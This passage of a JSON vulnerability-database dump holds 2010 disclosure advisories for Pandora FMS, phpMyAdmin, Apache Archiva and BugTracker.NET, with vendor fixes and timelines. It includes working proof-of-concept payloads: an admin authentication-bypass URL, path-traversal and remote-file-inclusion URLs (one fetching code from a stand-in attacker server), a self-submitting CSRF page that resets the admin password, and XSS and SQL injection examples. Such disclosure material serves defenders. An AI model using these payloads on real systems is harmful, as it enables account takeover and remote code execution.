http://en.wikipedia.org/wiki/Pandora_FMS\r\nCommon Vulnerability Scoring System (CVSS) v2 calculator:\r\nhttp://nvd.nist.gov/cvss.cfm?calculator&adv&version=2\r\nCommon Vulnerabilities and Exposures (CVE): http://cve.mitre.org/\r\n\r\n\r\n[+] Credits\r\n\r\nThese vulnerabilities has been discovered by Juan Galiana Lara -\r\n@jgaliana - http://juangaliana.blogspot.com/\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n\r\niQIcBAEBAgAGBQJM9NctAAoJEJaV5RMdiDI7cTMP/jzyDB8hcuTGYy+hHnehx0Fy\r\nYbVmWTMCUhIHZ6Y6ke1xLbFf0itFm/tMSvqC/20cAKC0x+QEmEVoSJPerT+Fc/3s\r\nIVjIEMxBbaKNM6inAElng5BzC0MTOjI+njtpF7pmLaIFBy8C77+u/LNrSM7tucy9\r\nWIx6ILVGSO0LY5vfgwdRAcJow6p/wn50U4Ur2XOVZ/X10Gbsb+9qMd4+q1d87Cw4\r\ncC+mqTefLeP8FNh6PB2tJpdpQqJ3R2G8719fHgmDm/5SVBkoXZRhjHKokR9+wtzP\r\nJPJWP3z1Zt+Wtn3+ANakDItBenbgafM2lMe0tkiy9LoQKMKepibLqOf9xfrKqTnP\r\n8CRffcV8nLorGBoKk7UKVb3I14llt34cu+Vcx2+WgDz37hXV1iK7pufGuFxVVRE4\r\n7etidHR9n7gO1WPbLmrKq4rrR02zhYnAHsGwjtFQId3ufRGSBTno3yNHFj1j0EvH\r\npARhwbRtjIiSk8JF3TjeTswGMpCIItpQ051K4Bcpbtzte7fX05CLoaF6xyJBJlS5\r\nyNuxaBnGZYVOvUd+emosH+5ngW7Qk8/wXljx2OyVOu6ip75UZ277MRLBJvlq+NC4\r\noBllQOzv521fd5hkgYEQ8VZQgWCzbeRTuh+t4z+MUHKTQlcE2I0ba9C6xdn0nkZF\r\nsn9vRJk4gc/PozOXDjC3\r\n=WmOh\r\n-----END PGP SIGNATURE-----\r\n\n ", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-70306"}, {"lastseen": "2017-11-19T15:59:55", "description": "No description provided by source.", "cvss3": {}, "published": "2014-07-01T00:00:00", "title": "Pandora FMS <= 3.1 Authentication Bypass", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-4279"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-70305", "id": "SSV:70305", "sourceData": "\n [+] Introduction\r\n\r\nPandora FMS (for Pandora Flexible Monitoring System) is a software\r\nsolution for monitoring computer networks. It allows monitoring in a\r\nvisual way the status and performance of several parameters from\r\ndifferent operating systems, servers, applications and hardware systems\r\nsuch as firewalls, proxies, databases, web servers or routers.\r\n\r\nIt can be deployed in almost any operating system. It features remote\r\nmonitoring (WMI, SNMP, TCP. UDP, ICMP, HTTP...) and it can also use\r\nagents. An agent is available for each platform. It can also monitor\r\nhardware systems with a TCP/IP stack, such as load balancers, routers,\r\nnetwork switches, printers or firewalls.\r\n\r\nThis software has several servers that process and get information from\r\ndifferent sources, using WMI for gathering remote Windows information, a\r\npredictive server, a plug-in server which makes complex user-defined\r\nnetwork tests, an advanced export server to replicate data between\r\ndifferent sites of Pandora FMS, a network discovery server, and an SNMP\r\nTrap console.\r\n\r\nReleased under the terms of the GNU General Public License, Pandora FMS\r\nis free software.\r\n\r\n\r\n[+] Description and Proof of Concept\r\n\r\n\r\n1) Authentication bypass - CVE-2010-4279 - CVSS: 10/10\r\n\r\nAn attacker could access to any account user, including admin, using the\r\n"hash login" authentication process. This kind of authentication method\r\nworks providing a username and a hash. The issue could be exploited\r\nremotely providing a username and the md5 of it when\r\n$config['loginhash_pwd'] is empty, that in fact is the default\r\nconfiguration.\r\n\r\nSnippet of vulnerable code in index.php:\r\n\r\n136 // Hash login process\r\n137 if (! isset ($config['id_user']) && isset ($_GET["loginhash"])) {\r\n138 $loginhash_data = get_parameter("loginhash_data", "");\r\n139 $loginhash_user = get_parameter("loginhash_user", "");\r\n140\r\n141 if ($loginhash_data ==\r\nmd5($loginhash_user.$config["loginhash_pwd"])) {\r\n142 logon_db ($loginhash_user, $_SERVER['REMOTE_ADDR']);\r\n143 $_SESSION['id_usuario'] = $loginhash_user;\r\n144 $config["id_user"] = $loginhash_user;\r\n\r\n\r\n\r\nProof of concept:\r\n\r\nhttp://servername/pandora_console/index.php?loginhash_data=21232f297a57a5a743894a0e4a801fc3&loginhash_user=admin&loginhash=1\r\n\r\nGot it! admin! :)\r\n\r\nBy default, any installation of this software allows unauthenticated\r\nattackers to perform an authentication bypass and a privilege escalation\r\nto admin.\r\n\r\n\r\n1.1) Additionally, a manual modification in order to use the hash_hmac\r\nfunction instead of the weak statement md5 ( $string . $KEY) is\r\nencouraged for security purposes.\r\n\r\nSnippet of code (index.php, version 3.1.1):\r\n\r\n145 // Hash login process\r\n(...)\r\n150 if ($config["loginhash_pwd"] != "" && $loginhash_data ==\r\nmd5($loginhash_user.$config["loginhash_pwd"])) {\r\n\r\nIn line 150, use\r\nhash_hmac("sha256",$loginhash_user,$config["loginhash_pwd"]), instead of\r\nmd5($lioginhash_user.$config["loginhash_pwd"])\r\n\r\n\r\n[+] Impact\r\n\r\nAn attacker can execute commands of the operating system, inject remote\r\ncode in the context of the application, get arbitrary files from the\r\nfilesystem or extract any data of the database including passwords and\r\nconfidential information about the monitored network/systems. Also it is\r\npossible to bypass the authentication or scale privileges to became\r\nadmin, gaining full control of the web application and web server. These\r\nvulnerabilities have a high impact to the confidentiality, integrity,\r\nand availability of the system.\r\n\r\n\r\n[+] Systems affected\r\n\r\nVersions prior and including 3.1 of Pandora FMS are affected\r\n\r\n\r\n[+] Solution\r\n\r\nApply the security fix for version 3.1:\r\nhttp://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/Final%20version%20%28Stable%29/pandorafms_console-3.1_security_patch_13Oct2010.tar.gz/download\r\n\r\n\r\nOr upgrade to version 3.1.1 from\r\nhttp://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/3.1.1/\r\n\r\n\r\n[+] Timeline\r\n\r\nAgo 2010: First contact to vendor\r\nAgo 2010: Confirmation of vendor\r\nSept 2010: Second contact: SQL Injection vulnerabilities\r\nSept 2010: Confirmation that the fix will be released on October\r\nOct 2010: PandoraFMS security patch for 3.1 version released\r\nOct 2010: Request for CVE numbers\r\nNov 2010: PandoraFMS version 3.1.1 released\r\nNov 2010: Disclosure of this advisory\r\n\r\n\r\n[+] References\r\n\r\nOfficial PandoraFMS site: http://pandorafms.org/\r\nSourceForge PandoraFMS site: http://sourceforge.net/projects/pandora/\r\nWikipedia entry about PandoraFMS: http://en.wikipedia.org/wiki/Pandora_FMS\r\nCommon Vulnerability Scoring System (CVSS) v2 calculator:\r\nhttp://nvd.nist.gov/cvss.cfm?calculator&adv&version=2\r\nCommon Vulnerabilities and Exposures (CVE): http://cve.mitre.org/\r\n\r\n\r\n[+] Credits\r\n\r\nThese vulnerabilities has been discovered by Juan Galiana Lara -\r\n@jgaliana - http://juangaliana.blogspot.com/\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n\r\niQIcBAEBAgAGBQJM9NctAAoJEJaV5RMdiDI7cTMP/jzyDB8hcuTGYy+hHnehx0Fy\r\nYbVmWTMCUhIHZ6Y6ke1xLbFf0itFm/tMSvqC/20cAKC0x+QEmEVoSJPerT+Fc/3s\r\nIVjIEMxBbaKNM6inAElng5BzC0MTOjI+njtpF7pmLaIFBy8C77+u/LNrSM7tucy9\r\nWIx6ILVGSO0LY5vfgwdRAcJow6p/wn50U4Ur2XOVZ/X10Gbsb+9qMd4+q1d87Cw4\r\ncC+mqTefLeP8FNh6PB2tJpdpQqJ3R2G8719fHgmDm/5SVBkoXZRhjHKokR9+wtzP\r\nJPJWP3z1Zt+Wtn3+ANakDItBenbgafM2lMe0tkiy9LoQKMKepibLqOf9xfrKqTnP\r\n8CRffcV8nLorGBoKk7UKVb3I14llt34cu+Vcx2+WgDz37hXV1iK7pufGuFxVVRE4\r\n7etidHR9n7gO1WPbLmrKq4rrR02zhYnAHsGwjtFQId3ufRGSBTno3yNHFj1j0EvH\r\npARhwbRtjIiSk8JF3TjeTswGMpCIItpQ051K4Bcpbtzte7fX05CLoaF6xyJBJlS5\r\nyNuxaBnGZYVOvUd+emosH+5ngW7Qk8/wXljx2OyVOu6ip75UZ277MRLBJvlq+NC4\r\noBllQOzv521fd5hkgYEQ8VZQgWCzbeRTuh+t4z+MUHKTQlcE2I0ba9C6xdn0nkZF\r\nsn9vRJk4gc/PozOXDjC3\r\n=WmOh\r\n-----END PGP SIGNATURE-----\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-70305", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T18:07:10", "description": "BUGTRAQ ID: 45100\r\nCVE ID: CVE-2010-4329\r\n\r\nphpMyAdmin\u662f\u7528PHP\u7f16\u5199\u7684\u5de5\u5177\uff0c\u7528\u4e8e\u901a\u8fc7WEB\u7ba1\u7406MySQL\u3002\r\n\r\nphpMyAdmin\u7531\u4e8e\u672a\u6709\u6548\u8fc7\u6ee4\u7528\u6237\u63d0\u4f9b\u7684\u6570\u636e\uff0c\u6240\u4ee5\u5728\u5b9e\u73b0\u4e0a\u5b58\u5728\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u5229\u7528\u6b64\u6f0f\u6d1e\u5728\u5176\u4ed6\u8bbf\u95ee\u7f51\u7ad9\u7684\u7528\u6237\u7684\u6d4f\u89c8\u5668\u4e2d\u6267\u884c\u4efb\u610f\u811a\u672c\u4ee3\u7801\uff0c\u4ece\u800c\u7a83\u53d6\u57fa\u4e8eCookie\u7684\u9a8c\u8bc1\u51ed\u636e\uff0c\u53d1\u52a8\u5176\u4ed6\u653b\u51fb\u3002\n\nMandrakeSoft Corporate Server 4.0 x86_64\r\nMandrakeSoft Corporate Server 4.0\r\nphpMyAdmin phpMyAdmin 2.11 - 3.3.6\r\nMandrakeSoft Enterprise Server 5 x86_64\r\nMandrakeSoft Enterprise Server 5\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMandrakeSoft\r\n------------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://www.linux-mandrake.com/en/security/", "cvss3": {}, "published": "2010-12-09T00:00:00", "type": "seebug", "title": "phpMyAdmin\u6570\u636e\u5e93\u641c\u7d22\u8de8\u7ad9\u811a\u672c\u6267\u884c\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-4329"], "modified": "2010-12-09T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20283", "id": "SSV:20283", "sourceData": "", "sourceHref": "", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-11-19T16:56:59", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Apache Archiva 1.0 - 1.3.1 CSRF Vulnerability", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3449"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-70369", "id": "SSV:70369", "sourceData": "\n ANATOLIA SECURITY ADVISORY\r\n--------------------------------------\r\n\r\n### ADVISORY INFO ###\r\n+ Title: Apache Archiva Cross-site Request Forgery Vulnerability\r\n+ Advisory URL: http://www.anatoliasecurity.com/adv/as-adv-2010-001.txt\r\n+ Advisory ID: 2010-001\r\n+ Versions: Archiva 1.0 to 1.3.1\r\n+ Date: 29/09/2010\r\n+ CVE-ID: CVE-2010-3449\r\n+ Vendor: The Apache Software Foundation\r\n+ Impact: Gaining Administrator Privileges\r\n+ CWE-ID: 352 \r\n+ Credit: Anatolia Security \r\n+ References: http://archiva.apache.org/security.html\r\n\r\n\r\n### VULNERABLE PRODUCT ###\r\n+ Apache Archiva: "Apache Archiva is an extensible repository management software that helps taking care of your \r\nown personal or enterprise-wide build artifact repository. It is the perfect companion for build tools such as \r\nMaven, Continuum, and ANT. Archiva offers several capabilities, amongst which remote repository proxying, security \r\naccess management, build artifact storage, delivery, browsing, indexing and usage reporting, extensible scanning \r\nfunctionality... and many more!"\r\n+ Homepage: http://archiva.apache.org\r\n\r\n\r\n\r\n### VULNERABILITY DETAILS ###\r\n+ Description: Apache Archiva affects from Cross-site Request Forgery. Application don't check which form sends\r\ncredentials. Technically, attacker can create a specially crafted page and force archiva administrators to view it \r\nand change their credentials. For prevention from CSRF vulnerabilities, application needs anti-csrf token, captcha\r\nand asking old password for action like change password. Vulnerability patched by the Apache Archiva Team.\r\n\r\n+ Exploit/POC: http://www.anatoliasecurity.com/exploits/archiva-csrf-poc.txt\r\n\r\n\r\n<html>\r\n<head>\r\n<title> Apache Archiva CSRF PoC </title>\r\n</head>\r\n<body>\r\n<form id="userEditForm" name="useredit" action="http://archiva:8080/archiva/security/useredit.action" method="post">\r\n <input type="hidden" name="user.username" value="admin" id="userEditForm_user_username"/>\r\n <input type="hidden" name="user.fullName" value="OWNED0DAY" id="userEditForm_user_fullName"/>\r\n <input type="hidden" name="user.email" value="0day@zer0day.com" id="userEditForm_user_email"/>\r\n <input type="hidden" name="user.password" value="1337owned" id="userEditForm_user_password"/>\r\n <input type="hidden" name="user.confirmPassword" value="1337owned" id="userEditForm_user_confirmPassword"/>\r\n <input type="hidden" name="user.locked" value="true" id="userEditForm_user_locked"/>\r\n <input type="hidden" name="__checkbox_user.locked" value="true" />\r\n <input type="hidden" name="user.passwordChangeRequired" value="true" id="userEditForm_user_passwordChangeRequired"/>\r\n <input type="hidden" name="__checkbox_user.passwordChangeRequired" value="true" />\r\n <input type="hidden" name="username" value="admin" id="userEditForm_username"/>\r\n <input type="hidden" id="userEditForm__submit" name="method:submit" value="Update"/>\r\n</form>\r\n<script type="text/javascript">\r\n document.forms[0].submit();\r\n</script>\r\n</body>\r\n</html>\n ", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-70369"}], "exploitdb": [{"lastseen": "2022-08-13T22:59:41", "description": "", "cvss3": {}, "published": "2010-11-30T00:00:00", "type": "exploitdb", "title": "Pandora Fms 3.1 - Directory Traversal / Local File Inclusion", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["2010-4281", "2010-4282", "2010-4283", "CVE-2010-4281", "CVE-2010-4282", "CVE-2010-4283"], "modified": "2010-11-30T00:00:00", "id": "EDB-ID:15643", "href": "https://www.exploit-db.com/exploits/15643", "sourceData": "[+] Introduction\r\n\r\nPandora FMS (for Pandora Flexible Monitoring System) is a software\r\nsolution for monitoring computer networks. It allows monitoring in a\r\nvisual way the status and performance of several parameters from\r\ndifferent operating systems, servers, applications and hardware systems\r\nsuch as firewalls, proxies, databases, web servers or routers.\r\n\r\nIt can be deployed in almost any operating system. It features remote\r\nmonitoring (WMI, SNMP, TCP. UDP, ICMP, HTTP...) and it can also use\r\nagents. An agent is available for each platform. It can also monitor\r\nhardware systems with a TCP/IP stack, such as load balancers, routers,\r\nnetwork switches, printers or firewalls.\r\n\r\nThis software has several servers that process and get information from\r\ndifferent sources, using WMI for gathering remote Windows information, a\r\npredictive server, a plug-in server which makes complex user-defined\r\nnetwork tests, an advanced export server to replicate data between\r\ndifferent sites of Pandora FMS, a network discovery server, and an SNMP\r\nTrap console.\r\n\r\nReleased under the terms of the GNU General Public License, Pandora FMS\r\nis free software.\r\n\r\n5) Path Traversal:\r\n\r\n5.1 - PHP File Inclusion (or RFI/LFI: Remote/Local file inclusion) -\r\nCVE-2010-4281 -CVE-2010-4282 - CVSS 8.5/10\r\n\r\nParameter 'page' of ajax.php is not properly sanitizing user-supplied\r\ninput. The function safe_url_extraclean is filtering ':' character, and\r\nit doesn't allow to use the string \"http://\"; to create urls, but allows\r\n'/' character and an attacker could reference remote resources via\r\nWindows UNC files, using //servername//resource/file\r\n\r\nNote that the first check in safe_url_extraclean is filtering '://', so\r\nwe can bypass the filter easily doing http://http://url, and it only\r\nstrip the first protocol://. However, the last preg_replace strips the :\r\ncharacter.\r\n\r\nProof of concept:\r\n\r\nUNC: http://servername/pandora_console/ajax.php?page=//server/share/test\r\n\r\nAs well, ajax.php allows to include any php file in the disk\r\n\r\nfilesystem:\r\nhttp://servername/pandora_console/ajax.php?page=../../../../../directory/file\r\n\r\nCharacter %00 is not allowed due safe_url_extraclean function filtering,\r\nand is not possible to include other files distinct that php files, but\r\nstill allows . and / characters.\r\n\r\n\r\n5.2 - PHP File Inclusion (or RFI Remote file inclusion) - CVE-2010-4283\r\n- - CVSS 7.9/10\r\n\r\nAn attacker can inject arbitrary PHP code and execute it remotely due\r\nargv[1] parameter is not filtered in file pandora_diag.php.\r\n\r\nPoC:\r\nhttp://servername/pandora_console/extras/pandora_diag.php?argc=2&argv[1]=http://serverattacker/salsa.php%00\r\n\r\nNote: that issue needs register_globals set to On to be exploitable.\r\n\r\n\r\n5.3 - Path traversal & Local file inclusion vulnerabilities -\r\nCVE-2010-4282 - CVSS 6.8/10\r\n\r\nAn attacker can include arbitrary files of the filesystem via id\r\nparameter in file pandora_help.php.\r\n\r\n\r\nSnippet of vulnerable code:\r\n\r\n 24 $id = get_parameter ('id');\r\n 25\r\n 26 /* Possible file locations */\r\n 27 $files = array\r\n($config[\"homedir\"].\"/include/help/\".$config[\"language\"].\"/help_\".$id.\".php\",\r\n 28\r\n$config[\"homedir\"].ENTERPRISE_DIR.\"/include/help/\".$config[\"language\"].\"/help_\".$id.\".php\",\r\n 29\r\n$config[\"homedir\"].ENTERPRISE_DIR.\"/include/help/en/help_\".$id.\".php\",\r\n 30 $config[\"homedir\"].\"/include/help/en/help_\".$id.\".php\");\r\n 31 $help_file = '';\r\n 32 foreach ($files as $file) {\r\n 33 if (file_exists ($file)) {\r\n 34 $help_file = $file;\r\n 35 break;\r\n 36 }\r\n 37 }\r\n...\r\n 62 require_once ($help_file);\r\n\r\n\r\nProof of concept:\r\n\r\nhttp://servername/pandora_console/general/pandora_help.php?id=/../../../../../../../boot.ini%00\r\n\r\nThis code is platform dependent bug, you can read more at\r\nhttp://seclists.org/fulldisclosure/2010/Jul/137\r\nOnly works in windows systems, an attacker can include local file using\r\n../ characters due parameter id is not filtered\r\nIf magic_quotes_gpc is Off, arbitrary files can be included, like\r\nboot.ini using NULL character (%00), if not, only php files are allowed\r\n\r\n\r\n5.4 - Path traversal & Arbitrary write and delete files - CVE-2010-4282\r\n- - CVSS 8.0/10\r\n\r\nIn file operation/agentes/networkmap.php the 'layout' parameter is\r\nhandled in an insecure way and it is used to write and delete files on\r\nthe filesystem.\r\nAn attacker could use this parameter to write in arbitrary paths and\r\neven remove files.\r\n\r\nSnippet of vulnerable code:\r\n\r\n32 $layout = (string) get_parameter ('layout', 'radial');\r\n...\r\n137 $filename_map = $config[\"attachment_store\"].\"/networkmap_\".$layout;\r\n138 $filename_img = \"attachment/networkmap_\".$layout.\"_\".$font_size;\r\n139 $filename_dot = $config[\"attachment_store\"].\"/networkmap_\".$layout;\r\n...\r\n157 $fh = @fopen ($filename_dot, 'w');\r\n158 if ($fh === false) {\r\n159 $result = false;\r\n160 } else {\r\n161 fwrite ($fh, $graph);\r\n162 $cmd = \"$filter -Tcmapx -o\".$filename_map.\" -Tpng\r\n- -o\".$filename_img.\" \".$filename_dot;\r\n163 $result = system ($cmd);\r\n164 fclose ($fh);\r\n165 unlink ($filename_dot);\r\n166 }\r\n...\r\n178 require ($filename_map);\r\n\r\n\r\nCharacter sequences '../' could be used to write files (due -o parameter\r\nin lines 162 and 163), as well as potentially remove files (line 157,\r\n161 and 165) or include them (line 178)\r\nAs well like in 5.3 this issue is only exploitable in windows\r\nenvironments because the same reason.\r\n\r\n\r\n[+] Impact\r\n\r\nAn attacker can execute commands of the operating system, inject remote\r\ncode in the context of the application, get arbitrary files from the\r\nfilesystem or extract any data of the database including passwords and\r\nconfidential information about the monitored network/systems. Also it is\r\npossible to bypass the authentication or scale privileges to became\r\nadmin, gaining full control of the web application and web server. These\r\nvulnerabilities have a high impact to the confidentiality, integrity,\r\nand availability of the system.\r\n\r\n\r\n[+] Systems affected\r\n\r\nVersions prior and including 3.1 of Pandora FMS are affected\r\n\r\n\r\n[+] Solution\r\n\r\nApply the security fix for version 3.1:\r\nhttp://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/Final%20version%20%28Stable%29/pandorafms_console-3.1_security_patch_13Oct2010.tar.gz/download\r\n\r\n\r\nOr upgrade to version 3.1.1 from\r\nhttp://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/3.1.1/\r\n\r\n\r\n[+] Timeline\r\n\r\nAgo 2010: First contact to vendor\r\nAgo 2010: Confirmation of vendor\r\nSept 2010: Second contact: SQL Injection vulnerabilities\r\nSept 2010: Confirmation that the fix will be released on October\r\nOct 2010: PandoraFMS security patch for 3.1 version released\r\nOct 2010: Request for CVE numbers\r\nNov 2010: PandoraFMS version 3.1.1 released\r\nNov 2010: Disclosure of this advisory\r\n\r\n\r\n[+] References\r\n\r\nOfficial PandoraFMS site: http://pandorafms.org/\r\nSourceForge PandoraFMS site: http://sourceforge.net/projects/pandora/\r\nWikipedia entry about PandoraFMS: http://en.wikipedia.org/wiki/Pandora_FMS\r\nCommon Vulnerability Scoring System (CVSS) v2 calculator:\r\nhttp://nvd.nist.gov/cvss.cfm?calculator&adv&version=2\r\nCommon Vulnerabilities and Exposures (CVE): http://cve.mitre.org/\r\n\r\n\r\n[+] Credits\r\n\r\nThese vulnerabilities has been discovered by Juan Galiana Lara -\r\n@jgaliana - http://juangaliana.blogspot.com/\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n\r\niQIcBAEBAgAGBQJM9NctAAoJEJaV5RMdiDI7cTMP/jzyDB8hcuTGYy+hHnehx0Fy\r\nYbVmWTMCUhIHZ6Y6ke1xLbFf0itFm/tMSvqC/20cAKC0x+QEmEVoSJPerT+Fc/3s\r\nIVjIEMxBbaKNM6inAElng5BzC0MTOjI+njtpF7pmLaIFBy8C77+u/LNrSM7tucy9\r\nWIx6ILVGSO0LY5vfgwdRAcJow6p/wn50U4Ur2XOVZ/X10Gbsb+9qMd4+q1d87Cw4\r\ncC+mqTefLeP8FNh6PB2tJpdpQqJ3R2G8719fHgmDm/5SVBkoXZRhjHKokR9+wtzP\r\nJPJWP3z1Zt+Wtn3+ANakDItBenbgafM2lMe0tkiy9LoQKMKepibLqOf9xfrKqTnP\r\n8CRffcV8nLorGBoKk7UKVb3I14llt34cu+Vcx2+WgDz37hXV1iK7pufGuFxVVRE4\r\n7etidHR9n7gO1WPbLmrKq4rrR02zhYnAHsGwjtFQId3ufRGSBTno3yNHFj1j0EvH\r\npARhwbRtjIiSk8JF3TjeTswGMpCIItpQ051K4Bcpbtzte7fX05CLoaF6xyJBJlS5\r\nyNuxaBnGZYVOvUd+emosH+5ngW7Qk8/wXljx2OyVOu6ip75UZ277MRLBJvlq+NC4\r\noBllQOzv521fd5hkgYEQ8VZQgWCzbeRTuh+t4z+MUHKTQlcE2I0ba9C6xdn0nkZF\r\nsn9vRJk4gc/PozOXDjC3\r\n=WmOh\r\n-----END PGP SIGNATURE-----", "sourceHref": "https://www.exploit-db.com/download/15643", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-13T22:59:40", "description": "", "cvss3": {}, "published": "2010-12-01T00:00:00", "type": "exploitdb", "title": "BugTracker.NET 3.4.4 - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["2010-3266", "2010-3267", "CVE-2010-3266", "CVE-2010-3267"], "modified": "2010-12-01T00:00:00", "id": "EDB-ID:15653", "href": "https://www.exploit-db.com/exploits/15653", "sourceData": " Core Security Technologies - CoreLabs Advisory\r\n http://corelabs.coresecurity.com/\r\n\r\n Multiple vulnerabilities in BugTracker.Net\r\n\r\n\r\n1. *Advisory Information*\r\n\r\nTitle: Multiple vulnerabilities in BugTracker.Net\r\nAdvisory Id: CORE-2010-1109\r\nAdvisory URL:\r\n[http://www.coresecurity.com/content/multiple-vulnerabilities-in-bugtracker]\r\nDate published: 2010-11-30\r\nDate of last update: 2010-11-30\r\nVendors contacted: BugTracker.NET team\r\nRelease mode: Coordinated release\r\n\r\n\r\n2. *Vulnerability Information*\r\n\r\nClass: Cross site scripting [CWE-79], SQL injection [CWE-89]\r\nImpact: Code execution\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2010-3266, CVE-2010-3267\r\nBugtraq ID: N/A\r\n\r\n\r\n3. *Vulnerability Description*\r\n\r\nBugTracker.NET [1][2] is an open-source web-based bug tracker written\r\nusing ASP.NET, C#, and Microsoft SQL Server. Several cross-site\r\nscripting and SQL-injection vulnerabilities were found in the following\r\nfiles of the BugTracker.NET:\r\n\r\n . *bugs.aspx*. SQL injection in line 141.\r\n . *delete_query.aspx*. No sanitization for 'row_id.Value' in line 30.\r\n . *edit_bug.aspx*. Variables without sanitization in lines 1846 and 1857.\r\n . *edit_bug.aspx*. No sanitization for variable 'new_project', line 2214.\r\n . *edit_bug.aspx*. XSS in line 2918.\r\n . *edit_comment.aspx*. XSS in line 233.\r\n . *edit_customfield.aspx*. Lines 165 and 172, no sanitization.\r\n . *edit_user_permissions2.aspx*. XSS in line 40.\r\n . *massedit.aspx*. SQL Injection in line 162.\r\n\r\n\r\n4. *Vulnerable packages*\r\n\r\n . BugTracker.NET v3.4.4.\r\n . Older versions are probably affected too, but they were not checked.\r\n\r\n\r\n5. *Non-vulnerable packages*\r\n\r\n . BugTracker.NET v3.4.5.\r\n\r\n\r\n6. *Credits*\r\n\r\nThis vulnerability was discovered and researched by Dami\u00e1n Saura\r\n[http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=researcher&name=Damian_Saura]\r\nand Alejandro Frydman from Core Security Technologies.\r\n\r\n\r\n7. *Technical Description / Proof of Concept Code*\r\n\r\n7.1. *XSS Vulnerabilities*\r\n\r\n[CVE-2010-3266 | N/A]. All XSS vulnerabilities can be exploited in\r\nsimilar ways. The following proof of concept shows how to exploit the\r\nXSS founded in 'edit_comment.aspx':\r\n\r\n/-----\r\n... \r\n230 <div class=align>\r\n231 <table border=0><tr><td>\r\n232\r\n233 <a href=edit_bug.aspx?id=<%\r\nResponse.Write(Request[\"bug_id\"]);%>>back to <%\r\nResponse.Write(btnet.Util.get_setting(\"SingularBugLabel\",\"bug\")); %></a>\r\n234 <form class=frm runat=\"server\">\r\n235\r\n236 <table border=0>\r\n...\r\n-----/\r\n First, login to BugTracker and create a comment in a previously created\r\nbug. Then, edit it using this URL:\r\n\r\n/-----\r\nhttp://localhost:4535/edit_comment.aspx?id=48&bug_id=3%3E%3Cscript%3Ealert%28%27%27%29;%3C/script%3E\r\n-----/\r\n As a result, the JavaScript code injected into the parameter 'bug_id'\r\nwill be rendered without sanitization in the line 233, and executed in\r\nthe context of the client's web browser.\r\n\r\n\r\n7.2. *SQL Injection Vulnerabilities*\r\n\r\n[CVE-2010-3267 | N/A]. All SQL injection vulnerabilities can also be\r\nexploited in similar ways. Consider, for example, the code located in\r\n'delete_query.aspx':\r\n\r\n/-----\r\n...\r\n26 if (IsPostBack)\r\n27 {\r\n28 // do delete here\r\n29 sql = @\"delete queries where qu_id = $1\";\r\n30 sql = sql.Replace(\"$1\", row_id.Value);\r\n31 btnet.DbUtil.execute_nonquery(sql);\r\n32 Server.Transfer (\"queries.aspx\");\r\n33 }\r\n...\r\n-----/\r\n In line 30, the value of 'row_id' is injected without sanitization into\r\nthe SQL query. This value arrives to the server in a hidden field of a\r\nclient request. As a result, a malicious user can manipulate this value\r\nin order to execute code in the database layer of the application.\r\n\r\n\r\n8. *Report Timeline*\r\n\r\n. 2010-11-29:\r\nCore Security Technologies notifies the 